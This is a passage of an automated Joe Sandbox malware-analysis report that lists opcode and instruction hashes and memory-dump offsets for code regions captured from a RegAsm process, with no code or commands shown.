                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b3e36abe8b8fafe1179c01c57cce45a3d5e121b2cb9491a48e6d51a00a28f886
                                                  • Instruction ID: c052aa7535c6fb26acd7ec591213a6faf4f20e424ddb77fc2fa0ec8e98db3aa7
                                                  • Opcode Fuzzy Hash: b3e36abe8b8fafe1179c01c57cce45a3d5e121b2cb9491a48e6d51a00a28f886
                                                  • Instruction Fuzzy Hash: 3651B530F10705DFEF646A68D85476F269AD789750F60442AE80BDB3E9CB6CCC4783A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43098eb39607a3b58ab4f17c34063f48e11e78a17eca580420b6d40e1c8d0504
                                                  • Instruction ID: b03481ed8df18ae03de4de912a9ee295aa406f63881d1eff34a804279c8dcd28
                                                  • Opcode Fuzzy Hash: 43098eb39607a3b58ab4f17c34063f48e11e78a17eca580420b6d40e1c8d0504
                                                  • Instruction Fuzzy Hash: 64418D31E00A099FDB70CEA9D881AAFFBF3EF84214F10492AE256D7650D331E9558B91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8f7f83246e4d048d4b1c64eb6d5c53e718fbe1b3c302185da8c2aa90f70a6d6
                                                  • Instruction ID: 4182af6ff888f035ff246942082ee779bd1648143ad8891ab33c5e44ed92f4c4
                                                  • Opcode Fuzzy Hash: b8f7f83246e4d048d4b1c64eb6d5c53e718fbe1b3c302185da8c2aa90f70a6d6
                                                  • Instruction Fuzzy Hash: 17317E35E107058BDB49CFB4D86069EF7B6EF8A300F108559E516EB394DB70EA46CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e5403eec03d39b7e74caa1d3c4b0a2abdb2ddb35ccb8954d4d179a44aabd91d
                                                  • Instruction ID: 62ab3f71931bd29f0bc138d94caef3908767437b832222d96360fe143b2c36c7
                                                  • Opcode Fuzzy Hash: 3e5403eec03d39b7e74caa1d3c4b0a2abdb2ddb35ccb8954d4d179a44aabd91d
                                                  • Instruction Fuzzy Hash: 73318B31E10B058BDB19CFA4D86469EB7B6EF89300F108529E906EB350EB71EE42CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8447de2e2275cae2b356f35a4dbcbae2d284e67984a32ef0cf5fd96d6ef7eeb
                                                  • Instruction ID: 1e272b00bff060d7b278b4c51f97b80783dea9ada56fc173ef83333a19980032
                                                  • Opcode Fuzzy Hash: d8447de2e2275cae2b356f35a4dbcbae2d284e67984a32ef0cf5fd96d6ef7eeb
                                                  • Instruction Fuzzy Hash: 9F219F75E01A059FDB50DF69D880AEEBBF5EB88310F208465E915E7394EB30D9408B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e10f7d54edff93f52c396e182cf0185f29006de0abd1de33f38be0f691c90c4
                                                  • Instruction ID: 577f81a3ca16e1fd8f06b998dae3fda7cfe9d0108b13a40a2bfc424d0d8474ac
                                                  • Opcode Fuzzy Hash: 9e10f7d54edff93f52c396e182cf0185f29006de0abd1de33f38be0f691c90c4
                                                  • Instruction Fuzzy Hash: 30214F75E00A159FDB50EF69D880AAEBBF5FB88310F248465E915E7394E731D9408B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676378649.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_ded000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13ab47c49ef4b72eebcbeb0815252dc6bb3c4690108b4a83d20e9fd4ef6f76df
                                                  • Instruction ID: 1408c6d6f0ce10283adb1216c979067a69052e53ca0e0e60d46fc146e44b3823
                                                  • Opcode Fuzzy Hash: 13ab47c49ef4b72eebcbeb0815252dc6bb3c4690108b4a83d20e9fd4ef6f76df
                                                  • Instruction Fuzzy Hash: 0531097150D7C09FCB039B24D994711BF71AB47214F2D85EBD8898F2A7C62A980ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676378649.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_ded000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d513248d9c4e062414bf40487ba737519ddef6ed24398ad28da1e717f19c1401
                                                  • Instruction ID: 4736127974db661ddda5e7520e09d0ece6456dd1357d20806cab0031780f4ebe
                                                  • Opcode Fuzzy Hash: d513248d9c4e062414bf40487ba737519ddef6ed24398ad28da1e717f19c1401
                                                  • Instruction Fuzzy Hash: 11210475504384EFDB14EF21D9C0B26BBA2FB94314F24C56DE8494F282CB76E846CA72
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676378649.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_ded000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57dd8ac10937591c9a515f60390d74ed9e1c58fd25a8ede89a80a7045695dc9a
                                                  • Instruction ID: b220ec6b7e9cb3ba80ff4dc9ee00765dd16e6e5b388bccba63e0f2e2e78a37bb
                                                  • Opcode Fuzzy Hash: 57dd8ac10937591c9a515f60390d74ed9e1c58fd25a8ede89a80a7045695dc9a
                                                  • Instruction Fuzzy Hash: F3213871904384EFDB11EF11D9C4B26BBA6FB84324F24C569EA490F241C776D846CA76
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676378649.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_ded000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fb41cbc17df9e0260b4820a5c4661dea47bf4c77ed0bd7b1e3814087fb087c8
                                                  • Instruction ID: 2b513a1928dcf0fbb1894af3a5f466abf10086347e07ce7efbf9e776eb5ab01a
                                                  • Opcode Fuzzy Hash: 1fb41cbc17df9e0260b4820a5c4661dea47bf4c77ed0bd7b1e3814087fb087c8
                                                  • Instruction Fuzzy Hash: B121C571504384AFDB14EF21D9C4B16BBA6FB84314F28C56DE9494B291CB36D847CA72
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9982804d8793919e855bb709e3fea0e38799c05e5286d6b05250029f025991dd
                                                  • Instruction ID: 6310e95d2fd55dcbcaff2c20dfda8a687ff58331beb52b6bb219491ddde3f628
                                                  • Opcode Fuzzy Hash: 9982804d8793919e855bb709e3fea0e38799c05e5286d6b05250029f025991dd
                                                  • Instruction Fuzzy Hash: B221E434B105189BDF58EB6DE8506AEBBA7EB85310F608465E409EB384DB31ED41CBD0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: